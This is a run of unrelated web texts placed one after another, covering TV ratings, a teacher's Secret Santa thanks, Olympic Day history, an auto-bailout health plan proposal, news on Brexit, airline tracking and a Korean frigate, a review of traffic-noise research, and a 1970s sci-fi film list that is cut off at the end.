In fact, “Resurrection” is the most-watched regular-timeslot drama premiere of the season in L3, a bit ahead of NBC's “The Blacklist” from September (17.043 million to 16.945 million). CBS' “Intelligence,” which had an off-night premiere behind “NCIS” on a Tuesday in January (behind that show's nearly 21 million viewers), tops all rookie dramas in L3 with 18.990 million viewers.
In adults 18-49, “Resurrection” grew by 32%, from a 3.8 to a 5.0, putting it not far behind NBC's “The Voice” (5.3 rating), which was the week's No. 2 broadcast in L3 (behind “The Big Bang Theory”).
ABC is replaying the pilot of “Resurrection” on Saturday in advance of the show's second episode the next night.
Another Sunday premiere, Fox's “Cosmos: A Spacetime Odyssey,” saw a similar percentage gain in adults 18-49, rising from a 2.1 to a 2.8 in L3. In total viewers, the Fox airing jumped from 5.77 million to 7.54 million. The debut of the show, simulcast on numerous Fox channels, drew 8.5 million same-night viewers across those networks.
Somehow I missed the notice that I had been matched through rematching! Since I normally enter my place through the parking garage, and I wasn't expecting anything to arrive, I hadn't checked the front entrance in a few days. So you can imagine my joy and surprise when one of my neighbors called to let me know I had packages starting to pile up out front...
The first I opened was very large...and very light. I opened it to discover it was packed full of kleenex! I didn't remember to put it on my wish-list, but my Santa is clearly wise enough to know that it wasn't because I don't run out of it every year! Definitely ready for cold and flu season now :)
The second package was much heavier. It was packed full of the essential supplies, the things that are always running out or breaking (or disappearing entirely...) Notebooks, pencils, erasers...and calculators and protractors! Wonderful! Last year my students were stuck using cardboard protractors that were easily bent, showed pencil marks, and of course harder to line up as they were opaque--these plastic ones will be much more accurate and easy to use, not to mention durable :)
The third package was full of books. The Magic School Bus series is great for my kids--not only is the reading level just right, but the subject matter is always interesting for the kids. I predict more than one of my students will read this entire set over the course of the year!
Thank you Reddit Santa! You're the best!
Edit: Earlier this week, I also received a HUGE box of goldfish crackers for my classroom, along with a very sweet note from my Santa. Love it! Last year I kept a box of graham crackers in my desk for those (especially the younger ones) that needed some extra munchies to get them through the day, but they'll like these goldfish so much better :)
And then today I arrived home to find a box of 30 (yes, that's THIRTY) leveled readers. I'm speechless right now...I'm actually tearing up as I type this...I can't wait for the kids to come in on Tuesday and see a whole new shelf of books for them!
Thank you M--you are an amazing, thoughtful person, and I am truly blessed to have you as my Santa.
Background
It was in 1947 during the 41st Session of the International Olympic Committee in Stockholm, that Doctor Gruss, IOC member in Czechoslovakia, presented a report on a World Olympic Day celebration which would primarily be a day of promoting the Olympic idea. The project was adopted some months later on the occasion of the 42nd IOC Session in St Moritz in January 1948. The National Olympic Committees were put in charge of organising this event and were requested to choose a date between 17 and 24 June, thereby celebrating the foundation of the International Olympic Committee at the Sorbonne, Paris, on 23 June 1894, where Pierre de Coubertin obtained the revival of the Olympic Games.
The first Olympic Day
The first Olympic Day was celebrated on 23 June 1948. On this occasion, Sigfrid Edström, IOC President at that time, conveyed a message to the young people of the world. Portugal, Greece, Austria, Canada, Switzerland, Great Britain, Uruguay, Venezuela and Belgium organised an Olympic Day in their respective countries.
Olympic Day in the Charter
In the 1978 edition of the Olympic Charter, the IOC recommended for the first time that all NOCs organise an Olympic Day to promote the Olympic Movement: “It is recommended that NOCs regularly organise (if possible each year) an Olympic Day intended to promote the Olympic Movement.”
Olympic Day Run
Over the last 20 years Olympic Day has been associated with Olympic Day Runs all over the world. First launched in 1987, the run was about encouraging all National Olympic Committees (NOCs) to celebrate Olympic Day and promoting the practice of mass sport. From 45 participating NOCs in the first edition in 1987, the numbers have grown to more than an hundred participating NOCs.
Today's Concept
Olympic Day is nowadays developing into much more than a run or just a sports event. Based on the three pillars “move”, “learn” and “discover”, National Olympic Committees are deploying sports, cultural and educational activities which address everybody - regardless age, gender, social background or sporting ability. Some countries have incorporated the event into the school curriculum and, in recent years, many NOCs have added concerts and exhibitions to the celebration. Recent NOC activities have included meetings for children and young people with top athletes and the development of new web sites directing people to programmes in their neighbourhood. This makes it easier for everybody to become part of Olympic Day. In recent years, the development in Social Media has helped the IOC to boost participation beyond NOC activities.
The auto industry bailout is stalled. Opponents can't seem to decide what's most objectionable: the lack of punishment for bad planning, or the idea that taxpayer money is being used to pay decent wages. There's a proposal to force UAW workers to accept the wage levels paid in the US by foreign auto companies, but that only amounts to about $3 per hour or so. The average cost for employee health care in the US is more than that.
So here's another idea: Let's have the government assume the cost of providing health care to autoworkers, and have it take the lead in deciding how those health dollars are spent. The financial picture for these companies would improve significantly if the government pays these costs for five years. And imagine what would happen if Tom Daschle directed the autoworkers health plan in his dual role as HHS Secretary and health reform chief. He could ensure that taxpayer dollars are being spent wisely, and he could build a working model for the reformed healthcare system of the future.
Come to think of it, those 2.5 million workers that will be working for the President's infrastructure program could be part of this new health plan too.
Here's one reason why this idea makes sense: Unlike other types of bailout, especially in the banking sector, a large portion of the health insurance dollar is spent in the first year of coverage. That means that most of this money will recirculate into the economy immediately, creating a short-term stimulus effect.
The automakers have some immediate cash needs, especially for $10 billion in outstanding bills. It would be reckless to allow these suppliers to go under. But overall, the numbers suggest that a plan like this could actually work. Here are some back-of-the-envelope calculations:
Let's use one of the lower numbers being thrown around and say that 241,000 people work for the Big Three.
Employer health plan premiums were $12,000 per year in 2007. It's gone up since then, but part of the cost is paid by the employee, and some employees will have health coverage through other sources (though not many in this case). So let's conservatively assume a per-employee cost to the Big Three of $8,000.
That gives us an annual cost of just under $2 billion ($1,928,000) to cover these 241,000 employees. We would hope to reduce cost inflation, but we can't promise that. But even if this plan suffers a raging 10% inflation rate, the total cost of a five-year "health bailout" would be less than $12 billion -- which is below the $14 billion previously proposed.
And look at what else we would get. Secretary Daschle and his team could use this process to build a model Data Exchange and health purchasing process. Even more innovative programs could be carried out, too, especially in Michigan (where 149,000 of the Big Three's workers live). Electronic data records, online and in-person wellness programs, "medical homes," new incentives for providers and enrollees -- Michigan can become the breeding ground for new ideas, and the autoworker health plan can become the incubator for health reform.
What happens if you add 2.5 million infrastructure workers to the mix? You have a nationwide canvas for sketching out new reform ideas before rolling them out to the nation as a whole. Then there is the problem of retired autoworkers. The unfunded liability for their health care has been estimated at nearly $100 billion. These retirees could be folded into the plan, too.
What are the objections? Some will say that this is government-run health care. But the government will be paying for it anyway, no matter what happens. So why not manage our money wisely? And the President-elect's reform proposals don't call for single-payer, but for a blend of insurance programs. Even with government oversight, it will be a private-sector initiative. (I'd vote for a Medicare coverage option, though.)
There are also those who will object because it doesn't punish the car companies enough for their bad decisions. That's a discussion for another day, but here's a thought: The car companies may deserve punishment for poor management, or for not building cars people want. But the credit crisis is not of their doing, and the lack of car loans is what's hurting them most right now. The "serenity prayer" fits here: The carmakers should change what they can change as a condition for aid. But there are some things that are beyond their control. We taxpayers, the ones who are bailing them out, should have the wisdom to know the difference.
Paul Krugman says that the current geographic concentration of the auto industry can't continue, and he's undoubtedly right. But that doesn't mean the transition can't be managed wisely and imaginatively, especially where employee health is concerned. And if we're paying the bill, why not use our money to leverage some real change?
______________________
Thank you from the very bottom of our hearts for making Shantae: Half-Genie Hero a reality! We could not have done this without YOU!!! We're absolutely committed to making this game everything it can be! You not only funded the game, but also s-t-r-e-t-c-h-e-d all the way to Risky Boots Mode, 2 Bonus Chapters, and 3 additional costumes to be enjoyed by everyone once the game releases next year. The final tally is…
Kickstarter = $776,084.00
PayPal = $35,878.00
Total Pledges: $811,962.00
We will continue to send out updates regularly! In the meantime we will keep PayPal open, and any additional pledges will STILL be eligible for any remaining Reward Tiers. New PayPal pledges will be applied to our next Stretch Goals. If you have additional questions, please visit www.wayforward.com or send us an email at support@wayforward.com
Thank you once again! We've had an incredible time working with you so far, and look forward to the journey ahead!
Malaysia Airlines, whose MH370 airplane vanished with 239 people onboard three years ago, has become the first airline to track its fleet of planes via satellite.
The airline signed an agreement with aerospace companies Aireon, Sitaonair and FlightAware, that will enable it to monitor its aircraft in real time, anywhere across the world.
Aireon's new satellite network is expected to be completed in 2018.
“Real-time global aircraft tracking has long been a goal of the aviation community,” Malaysia Airlines Chief Operating Officer, Izham Ismail, said in a statement.
“We are proud to be the first airline to adopt this solution."
Most flights are traceable by radar; transponders on planes automatically transmit the plane's identity via a four-digit code to air traffic controllers.
Once an aircraft is more than 240km out to sea, airliners then use equipment like high-frequency radio to keep in touch with air traffic control.
Flight MH370 which disappeared in 2014, was similarly packed with such equipment but vanished without a trace.
The plane, which left from Kuala Lumpur and was Beijing-bound, has become one of the world's greatest aviation mysteries.
According to a Bloomberg report, however, the Aireon tracking system might not have made a difference in tracking down MH370 because the plane's location transmitter was not turned on — and would not have been visible to satellites.
Popular live-action event game Humans vs. Zombies comes to the Escapist Expo this September.
What is it about large, public places that always seems to attract the undead? Think about it: Dead Rising's mall, Lollypop Chainsaw's high school, Dead Island's resort; there must be some sort of internal zombie calculus comparing brains to acreage that triggers just before lunch time. Well, it turns out that the Durham Convention Center is no different, as this year's Escapist Expo has drawn the hordes. Namely, you. The Escapist is pleased to announce the addition of Humans vs. Zombies to the 2012 Expo's line up, a real-life, three-day-long game of socks, survival, and Nerf gun warfare.
If you did the college thing, you may be somewhat familiar with Humans vs. Zombies, or a variation thereof. If not, it basically works like this: Everyone is assigned a bandana to wear on their arm as a sign that they're "human." One person is then chosen at random to become Patient Zero, the first in what may or may not become a massive lineage of brain-munchers by the convention's end. Mr. or Ms. New Zombie will then wear his or her bandana up top on their head before gleefully proceeding to hunt for brain. Because we greatly prefer you being alive (and don't feel quite comfortable asking anyone to take an actual spoonful of grey matter to the gut), this will be accomplished by tagging. Once the zombie tags a human, the human must move his or her bandana to the appropriate position, and can immediately begin stalking cranium chow for themselves. The humans aren't utterly defenseless, though, as zombies can be stunned by a sock or foam dart launcher. Throw a (provided, non-foot-funky) sock, or Nerf blast your attacker to freeze it in its tracks for ten minutes while you gloriously make a quick escape.
As the event continues, it won't be long before the undead population begins to rise exponentially. At the end of the Expo, one of two things will happen: either the zombies will win by converting everyone, or a handful of scrappy survivors will have proven that they're the ones to call in the advent of an actual outbreak.
Human vs. Zombies is just one of the many events we've got in store for Expo attendees designed to make things fun, and keep you on your toes. So, if you want to prove to your buddy who's the better zombie survivor (instead of just arguing about the hypotheticals into the wee hours of the night) come register to join us at the first annual Escapist Expo, to be held in Durham, NC this September.
Image: Humans vs Zombies
There is no way of knowing whether Thurgood Dennis would have already developed into a shutdown cornerback for a Division I college football program. No way to quantify how his 6-foot, 178-pound frame could handle wide receivers with a five-inch height advantage.
The only quantifiable measurement that allows anybody to make comparisons now is his speed. And speed, it turns out, Dennis has in bunches.
Article continues below ...
CBSSports.com college football writer Chris Huston recently ranked the fastest players in college football among those with track backgrounds. Using official “Fully Automated Time” measurements that included 100- and 200-meter dash times, he compiled a list that included players from Florida State, California, LSU, Baylor, Boise State, Texas, Rutgers and South Carolina.
Among that group was one player from the University of Wisconsin-Eau Claire, a Division III school that plays in the Wisconsin Intercollegiate Athletic Conference: Thurgood Dennis, dubbed the fastest returning player in all college football.
Who is Thurgood Dennis? He is the defending D-III national outdoor track champion in the 100-meter dash and the 4 x 400 relay. And it would appear he's about to garner national attention on the football scene as well.
“He's by far the fastest player I've ever coached,” UW-Eau Claire football coach Todd Glaser said. “I think he's got a lot of make-up speed, so if he makes a mistake, he can make it up. He had a really good year.”
Dennis, a native of Allouez, Wis., described himself as a late bloomer who received little interest from Division I schools for track or football. His largest football offer was from Division II Minnesota Duluth. He was offered a half scholarship by the Wisconsin track team, but the offer came the summer before his freshman year of college — after he already enrolled in classes at UW-Eau Claire — and he would have had to live in an off-campus hotel initially.
“To me, that felt like a wasted year,” Dennis said. “Even though it would have been cool to run as a Badger, I was already pretty well set at my school. I would have had to give up football cold turkey, which is not something I wanted to do. I just don't want to stop playing football.”
If Dennis proves to be as talented on the football field as he has on the track, he may not have to stop anytime soon. A football player with his rare speed could ultimately cause an NFL team to take a chance on him, even though those decisions remain two years away.
Last season as a sophomore, Dennis was thrust into a starting role at cornerback when one of the team's seniors sustained a head injury. He went on to record 58 tackles with three pass deflections in 10 games. Now, his role — and expectations — are going to change considerably as an upperclassman.
“We're expecting to put him in a leadership role to help our young kids out,” Glaser said. “He works extremely hard. His work ethic is tremendous. He's a role model in the classroom, on the field. We want him to make big plays. We know he's got big-play capabilities.”
During the national track championships, Dennis won the 100 with a time of 10.77, but his career best is 10.30. His fastest 200 time is a 20.86. As a means of comparison, the provisional qualifying times for the 2012 United States track and field Olympic team were 10.28 in the 100 and 20.75 in the 200.
Dennis lists his goals as trying to play in the NFL or qualify for the Olympics.
“It's kind of weird to say you're preparing for the NFL or the Olympics, but you have to have a goal,” Dennis said. “Otherwise, what would you be motivated by? I just want to keep playing both sports as long as I can and to the best of my ability. Wherever I end up with that, then I'll be happy with it.”
Despite the goals he has put forth for himself, Dennis also is levelheaded and realistic about his chances. He recognizes the odds of a Division III player being drafted in the NFL are astronomical, though he is holding out hope he could be taken by a team in free agency.
Since 1991, only 16 Division III players have been selected in the NFL Draft — none higher than the fourth round. There have been 5,920 selections made by NFL teams since that span. In other words, DIII players are drafted .0027 percent of the time.
Dennis is majoring in English education and wants to become a teacher and a football coach at a high school near the Twin Cities. He compared his football abilities to Jarrett Bush, a 6-foot, 200-pound cornerback for the Green Bay Packers from Utah State.
“It's so rare for a Division III athlete to show himself to an NFL team,” Dennis said. “I would love to play in the NFL. That would be huge. I think I could even be on a practice squad and sort of imitate the other team's fastest guy or contribute on special teams.”
If Dennis earns the opportunity to perform in front of scouts with an NFL combine-style workout, he likely will have to wow them with a strong 40-yard dash time. Dennis said he hadn't run a legitimate 40 since his junior year of high school, when he ran a 4.81, although his body has changed drastically since that time. He was clocked at 4.63 running in flat shoes on a basketball floor at UW-Eau Claire, but he said it wasn't an accurate representation of his speed.
“Our 40-yard dash training for the football team, the upperclassmen do a training part of it and only the freshmen truly get measured,” Dennis said. “It's on an old, crappy system. You've got to put your thumb down on the ground, and it always is bugging out. I would hope I would be somewhere in the 4.5 to 4.4 range.”
Dennis indicated he still needed to develop a greater comfort level as a cornerback and maintain a sense of confidence that he could stop any receiver. If he made a misstep last season, he typically tackled the ball carrier from behind anyway because he was faster than everybody. But those mistakes won't allow him to make a pro team.
For now, Dennis' goals remain in front of him — where he hopes to keep receivers as well.
“He's a quick learner and he got better every game last year,” Glaser said. “I think by the time he's done, he's going to be something really special.”
Follow Jesse Temple on Twitter
The European Commission has recommended to the European Council that "sufficient progress" has been made in the first phase of Brexit negotiations with the UK.
During a press conference in Brussels early on Friday morning, British Prime Minister Theresa May said there would be no hard border with Northern Ireland and confirmed the Good Friday Agreement would be maintained.
May also confirmed EU citizens living in the UK would be able to "go on living their lives as they have done before".
The Commission's assessment is based on a joint report agreed by the negotiators of the Commission and the UK government.
This means the Commission is satisfied there has been sufficient progress on the three priority areas of negotiations – citizens' rights, the Northern Irish border and the financial settlement, or so-called divorce bill.
First breakthrough
A statement released by the European Commission states the rights of EU citizens living in the UK and UK citizens in the EU27 will "remain the same after the United Kingdom has left the EU".
"As regards the financial settlement, the United Kingdom has agreed that commitments taken by the EU28 will be honoured by the EU28, including the United Kingdom," the statement reads.
President of the European Commission, Jean-Claude Juncker, said they had now "made a first breakthrough".
"I am satisfied with the fair deal we have reached with the United Kingdom," Juncker said in a statement.
"If the 27 member states agree with our assessment, the European Commission and our chief negotiator Michel Barnier stand ready to begin work on the second phase of the negotiations immediately.
"I will continue to keep the European Parliament very closely involved throughout the process, as the European Parliament will have to ratify the final Withdrawal Agreement."
The European Council will decide on December 15 if sufficient progress has been made to allow negotiations to proceed to their second phase.
Challenges ahead
President of the European Council, Donald Tusk, has laid out his proposals in the draft guidelines, which he has now sent to the leaders of the Council.
He proposed the UK respect the whole of EU law, budgetary commitments, judicial oversight and all the related obligations during the two-year transition period when they will remain part of the single market and customs union.
"Clearly, within the transition period following the UK's withdrawal, EU decision-making will continue among the 27 member states, without the UK," he wrote in a statement.
He also called for "more clarity" on how the UK sees future relations after it has left the EU.
Tusk said the most difficult challenge was still ahead.
"We all know breaking up is hard," he said. "But breaking up and building a new relation is much harder.
"Since the Brexit referendum, a year and a half has passed. So much time has been devoted to the easier part of the task.
"And now, to negotiate a transition arrangement and the framework for our future relationship, we have de facto less than a year."
First chapter
The European Union's chief Brexit negotiator Michel Barnier said that, if the European Council decides progress is sufficient, "we will then have completed the first chapter of these extraordinary negotiations".
Referring to the financial settlement, Barnier said both parties agreed on a methodology that rests on three principles.
He confirmed no member state would pay more or receive less because of Brexit and said the UK would honour all commitments entered into during its membership.
They have also agreed on a list of components on the financial settlement and on the conditions of the UK's participation of the MFF 2014-20 and arrangement concerning the EIB, ECB and the EDF.
"Even if figures are bandied about, some of them realistic, I am not going to mention any figures myself," he said. "We will have to firm up the situation."
He also highlighted citizens' rights would be guaranteed – for UK citizens living in Europe and European citizens living in the UK.
"All citizens that arrived before Brexit can reside, work and study as today," he said.
Irish Taoiseach Leo Varadkar said at a news conference broadcast by the BBC that the deal has "set out what we set out to achieve".
"It is the end of the beginning," he said. "We don't want to see Northern Ireland drift apart from Great Britain."
South Korea's Navy will arm its latest frigates with tactical missiles that can strike deep into North Korea, a military source said Sunday.
The plan calls for arming the Incheon-class ships with land-attack missiles that have a range of 150-200 kilometers. The missiles, to be loaded onto the ships starting in September, will allow the frigates the ability to attack key targets in the communist country's interior from the sea.
“Initially, the plan was to arm batch 2 Incheon-class ships with the tactical missiles, but the government, after conducting feasibility studies, decided to retrofit the batch 1 ships,” the official, who declined to be identified, said. The missiles will be housed in angled canister launchers on deck.
The first batch consisting of six frigates have an empty displacement of some 2,300 tons and were launched starting in 2011. The sixth and last frigate of batch 1 is undergoing sea trials and will join the fleet early next year. The second batch of ships will be heavier with an empty displacement of 2,800 tons.
The frigates that are replacing the aging Ulsan-class frigates and Pohang-class corvettes have a 127-millimeter main gun with point defense being handled by the 20 mm Phalanx system. It also has Rolling Airframe Missiles, or RAMs, for short-range anti-aircraft defense and employs SSM-700K to deal with surface threats as well as torpedoes to destroy submarines.
The decision to arm the relatively small coastal defense ships with tactical missiles comes as Seoul is moving to give the Navy greater flexibility not only to engage enemy ships but also to respond to diverse threats.
“The tactical missiles will greatly enhance the combined fighting ability of South Korea's armed forces and add another layer of deterrence against North Korean aggression,” he said.
South Korea has already been arming its tactical land-attack missiles on its larger destroyers to take out key North Korean targets in case of conflict. It has, moreover, been moving to upgrade the fighting capability of existing ships with new weapons systems.
The Navy said it plans to deploy short-range anti-aircraft missiles with a range of 20 km on its latest patrol boats that are already armed with anti-ship missiles.
Is one man's noise another man's music?
Noise is considered a type of pollution because it is an unwanted stimulus that intrudes into a person's environment, but it is quite difficult to define in any objective way. Definitions are invariably subjective because noise is a sound that a person does not want to hear (Evans & Stecker, 2004).
Some research suggests that the subjective experience of noise (i.e., annoyance), not the level of noise itself, is the important factor regarding people's health (Nivision & Endresen, 1993). Much research has examined chronic noise exposure (defined objectively as a critical level of decibel) in relatively large samples.
However, the effects of noise are also influenced by other factors such as personality and meaningfulness of the noise (Cohen et al., 1986). Babisch and colleagues (2013) emphasize that noise annoyance is largely determined by noise level, so both factors are not independent of one another.
Do we “get used to” noise?
Subjective reports show that people begin to sleep better as they get used to traffic noise, which reflects a so-called habituation process. However, objective polygraphic examinations of people's brains do not reveal any changes as people begin to “get used to” noise (Kuroiwa et al., 2002; Xin et al., 2000).
In fact, noise exposure may sometimes lead to increased sensitization to noise (Nivison & Endresen, 1993). It seems that some individuals habituate to noise, while others do not. How people adapt seems to depend on people's sensitivity or personality (Kawada, 2011).
Predictability and the possibility of controlling unwanted noise has been found to reduce cognitive after-effects of noise exposure (Glass & Singer, 1972). Indeed, stress experiments have demonstrated that control is an important factor in moderating one's physiological stress reactions (Babisch, 2001).
Noise affects us via two distinct routes
The noise reaction model proposes that noise activates the human organism via a direct and an indirect route. The direct route is determined by the immediate interaction of the acoustic nerve with different structures of the central nervous system, which in turn increases physiological stress.
The indirect route refers to the cognitive perception of noise, and it is linked to an increase in emotional stress. Both routes activate the autonomic nervous system and the endocrine system, and a long-term overactivation of these systems may have adverse health effects (Babisch et al., 2013).
Many of us live in noisy environments and seem to do fine, but how does noise exposure in fact affect us physically as well as psychologically. What does research tell us? In this article, I present six unfortunate ways that noise affects us.
6 ways traffic noise affects people
1. Cognitive functioning
Stansfeld and colleagues (2005) examined how aircraft and road traffic noise influenced almost 3,000 children's cognition and health. The study was cross-national with participants from both the Netherlands, Spain and UK.
The authors found a linear exposure-effect association between chronic exposure to aircraft noise at school (not traffic noise) and impaired reading comprehension and recognition memory in children. Neither aircraft noise nor traffic noise affected sustained attention. In this study, traffic noise did not have a negative impact on children's cognition. The authors provide a possible explanation:
… sound that shows appreciable variation over time (changing state) impairs cognitive function whereas sound that does not vary (steady state) has little effect. The noise of aircraft flyovers has an unpredictable rise time that might attract attention and distract children from learning tasks. (p. 1948).
One study found that reading scores of children in classrooms near train tracks were lower than scores of children whose classrooms were quieter (Bronzaft & McCarthy, 1975). Another study found that noise affected long-term memory in 9-12 year-old children (Evans et al., 1995).
Yet another study by Tassi and colleagues (2013), involving 20 individuals exposed to daily railway noise and 20 individuals living in quiet environments, found that long-term exposure to railway noise had some unfortunate consequences, reflected by increased reaction times in different cognitive tasks and declines of some parts of the attentional system.
2. Blood pressure
A meta-analysis by Ndrepepa & Twardella (2011) concludes that there is a positive and significant association between noise annoyance from road traffic and the risk of hypertension, and populations of all ages seem to be affected (Chang et al., 2009). A study by Fuks and colleagues (2010), involving over 4,000 participants, found that traffic noise increased blood pressure significantly. Workplace noise has been found to increase blood pressure as well (Fogari et al., 1994).
3. The autonomic nervous system
A field study by Graham and colleagues (2009) found that higher indoor traffic noise was associated with parasympathetic withdrawal during the second half of the sleep period. Parasympathetic activation is normally increased during sleep, while sympathetic activation is decreased, which helps restoration of the body. So changes in activity of the autonomic nervous system during sleep may be related to declines in well-being and long-term health. Earlier studies have also reported sympathetic activation to traffic noise during sleep, according to the authors.
4. Stress
Babisch and colleagues (2001) found increased physiological stress in about 800 women, who were exposed to noise during their sleep. The increased physiological arousal was reflected by increases in catecholamines, specifically noradrenaline. Subjective measures of annoyance or disturbance were positively associated with levels of noradrenaline.
Another study by Evans and colleagues (1995) found both higher adrenaline and noradrenaline levels in overnight urine samples from 9-12 year-old children who were exposed to aircraft noise compared to children from less noise exposed areas.
Waye and colleagues (2002) found that workers who were more sensitive to noise showed a higher stress (cortisol) level, and they rated a low-frequency noise as more annoying than workers who were less sensitive to noise.
5. Health
Previous studies on the effect of aircraft noise exposure at children's schools have reported an association with more hyperactivity symptoms (Haines et al., 2001; Stansfeld et al., 2009; Crombie et al., 2011).
Tiesler and colleagues (2012) found that higher levels of noise at the children's homes were associated with an increased hyperactivity/inattention and more emotional symptoms. The authors note that the emotional symptoms may be caused by sleeping problems. The authors also highlight the fact that noise exposure at home was not associated with overall mental health problems, even though it was associated with the above-mentioned symptoms. Evans and colleagues (1995) even found noise expousre to be linked to a poorer quality of life in children. Another study by Nivision & Endresen (1993) found a strong association between subjective noise annoyance, noise sensitivity and health complaints.
6. Sleep
Proper sleep is fundamental to good physiological and mental helth. According to The World Health Organization, In the European Union, 45% of citizens live in areas where environmental night-time noise levels are considered uncomfortable for sleeping, and approximately 30% of citizens are exposed to night-time noise at levels known to cause sleep disturbance (Graham et al., 2009).
Fyhri & Aasvang (2010) found a significant relationship between noise annoyance at night and sleeping problems. Interestingly, exposure to noise in the daytime seems to make subsequent sleep worse (Kawada, 2011). A cross-sectional study found a moderate and significant exposure-response relationship between nocturnal road traffic noise exposure and sleep quality and problems with sleepiness during daytime (Öhrström et al., 2006). People exposed to chronic railway noise also show more sleepiness during the day (Tassi et al., 2013).
A review by Kawada (2011) emphasizes that noise can cause sleep disturbances. These can be classified into delay of sleep onset, or awakening in the middle of the night, or early morning awakenings. Noise also makes the stages of sleep shallower, reducing the feeling of rejuvenation after sleep. At last, intermittent noise during sleep has more adverse effects than continuous noise (e.g., like aircraft flyovers).
Advertisements
This story was updated June 29 to correct a conversion error.
LE BOURGET, France — Although Europe's Space Rider reusable spaceplane is three years or so from its debut, the European Space Agency is already making plans to privatize the unmanned orbital vehicle.
By 2025, ESA officials said, Space Rider could be operating commercially, flying science payloads and bringing them back to Earth for roughly $40,000 per kilogram.
Arianespace, the Evry, France-based launch services provider, would likely serve as Space Rider's operator, offering industry and government customers the opportunity to fill the spaceplane 800-kilogram payload capacity with microgravity science, materials testing, telecommunications and robotics demonstrations.
The Italian Aerospace Research Centre (CIRA) and Thales Alena Space manage ESA's Space Rider project as co-prime contractors. Lockheed Martin is contributing to the design work. Funding for the program's design phase was approved in December by ESA's 22 member states.
A 2020 test flight would see Space Rider launch atop Arianespace's Vega-C rocket (which makes its own debut in 2019) and land on a runway on one of the Atlantic's Azores islands, Santa Maria.
During operational flights, Space Rider will orbit 400 kilometers above the Earth for a few months at the time, opening its payload bay doors to expose experiments to the space environment. Customers will pay roughly $40,000 per kilogram to fly their payloads on Space Rider, according to Giorgio Tumino, ESA's Space Rider and Vega rocket development program manager.
“This cost is usually only to go into orbit, but in this case [with Space Rider] it is to go and come back to Earth,” Tumino told SpaceNews here. “We really believe there is a market, a niche, that will drive this. We have already done preliminary studies, analyses and we see that it [Space Rider] is a very convenient tool.”
Tumino said Arianespce, as the commercial partner for the Vega rocket, will likely operate Space Rider, as well.
Space Rider, at an expected 4-5 meters in length, will be about half the size of the U.S. Air Force's X-37B unmanned orbital spaceplane. X-37B completed its fourth classified mission in May, landing at NASA's Kennedy Space Center just shy of a two-year stay in orbit.
After Space Riders's first mission in 2020, it would fly five more missions spaced six to 12 months apart, according to Tumino. During this first few years of operations, a decision would be made about how many Space Riders to build for commercial operations; Arianespace, he said, might decide to operate a fleet of them.
During development, a full-scale Space Rider model will be dropped in 2019 from an atmospheric balloon or helicopter to test the vehicle's parafoil landing system.
Space Rider is based on ESA's successful suborbital re-entry test vehicle, the Intermediate Experimental Vehicle (IXV). In 2015, the IXV flew more than halfway around the world in 100 minutes before parachuting into the Pacific Ocean for recovery.
The 1970's is well known for numerous science fiction film classics. Some of the best and most well known films in the genre came out during that decade including Star Wars, A Clockwork Orange, Logan's Run, Alien, and Soilent Green. Nevertheless, there are a number of less well known gems from the era that are worth checking out. To celebrate the upcoming release of Star Wars: Rogue One, from the writer who brought you the ten most underrated horror films of the 1970s, comes a list focused on the science fiction films that are not quite as well known. Since he along with “Fangoria” author Josh Hadly covered some of the best Star Wars rip offs, none of those films will be included on this list.
Dark Star – 1974
Dark Star is a bizarre kind of sci-fi comedy. It is John Carpenter's debut as both a writer and director as well as Dan O Bannon's writer debut. In the far reaches of space, on a 20 year long mission, a small crew finds things start to go wrong. These include running out of toilet paper, getting chased by an alien beach ball, and a smart bomb that thinks it's God. This film is full of great laughs and it's fascinating to see how two film greats got their start.
A Boy and His Dog – 1975
Set after WWIV, this film is one of the strangest entries on the list. In this film a young boy and his dog share a telepathic bond which leads them on a search for food and sex. They are eventually lured into a underground colony of people who can't reproduce. The citizens use the boy for his sperm and plan to get rid of him afterwards. If you re a fan of the stranger side of sci-fi, then this film is much watch.
The Man Who Fell To Earth – 1976
After playing an alien on his 1972, masterpiece of an album, Ziggy Stardust, David Bowie was perfectly cast as an extraterrestrial. In this science fiction drama, David Bowie comes to Earth to find water for his dying planet. He starts a company and ends up meeting a woman named Mary Lou who he falls in love with. The films are very dramatic and is also more of a cerebral film. You also get to see an over the top gun sex scene!!!!
Westworld – 1973
Written by Jurassic Park author, Michael Crichton, Westworld, is the first film to use digital image processing pixellate photography to simulate an android's point of view. The story is about a malfunctioning robot at an adult themed music park causing chaos and terror. The film was very successful spawning a sequel called, Futureworld, a tv show in 1980 called, Beyond Westworld, and a brand-new show this year just called Westworld. Though the film was a big hit on release, it seems to be mostly forgotten by today's audience. Hopefully the new TV show will revive interest in this classic once more.
THX 1138 – 1971
Before George Lucas became the man we all know and love (and eventually would hate) for Star Wars, he made an excellent indie film known as THX 1138. This picture is about a dystopian world where android police use drugs to suppress the public's emotion and sexual desire's. Originally a flop at the box office, the film gained a cult following after Lucas made Star Wars. With a great visual style and story line, this is a must be seen for any fan of dystopian films.
Time After Time – 1979
Starring acting legend, Malcolm McDowell and directed by genre veteran Nicolas Meyer (Star Trek's 2 and 6), Time After Time is a great spin on historical fiction. Author H.G Wells comes after Jack the Ripper when he uses a time machine to travel to the 20th century. While this concept sounds like it might be goofy, the film actually makes it work through good writing and performances.
Rollerball – 1975
Starring James Caan ( The Godfather, Misery), Rollerball is a dystopian sports/action film from Canada. In a futuristic society where corporations have replaced countries, a sport known as Rollerball has been invented to control the population. Filled with tons of action, cool effects and performances this is the best sports film out there (though that is not a very long list). In 2002 a remake was made. Avoid that film at all costs.
The Brood – 1979
David Cronenberg has always been known for horrific films that involve the human body and The Brood is one of the best of it's kind. A man tries to uncover a therapists bizarre treatment of his insane wife during a series of murders. This sci-fi/horror film is full of atmosphere and tension and has some of the most unsettling scenes put to film. If you love trippy films or just a fan of horror in general this film along is one to not miss out on.
Sengoku Jieitai – 1979
Japanesse actor Sonny Chiba is mostly known for his martial arts classics such as the Street Fighter series (no relation to the game) and The Bodyguard (no relation to the Costner film). He is sadly not known for being in a film that is both one of the best war films of all time and one of the best science fiction films of all time. Also known as G.I. Samurai and Time Slip, this movie tells the story of an army squad that is transported hundreds of years in the past. They get drawn into a struggle between two clans fighting to become supreme shogun. The L.T of the squad sees this as a way to live his dream of ruling Japan and teams up with one of the clans. Many cuts of this film exist, but only the full 139 min version of the film is worth seeing as the other cuts remove important scenes.
Zardoz – 1974
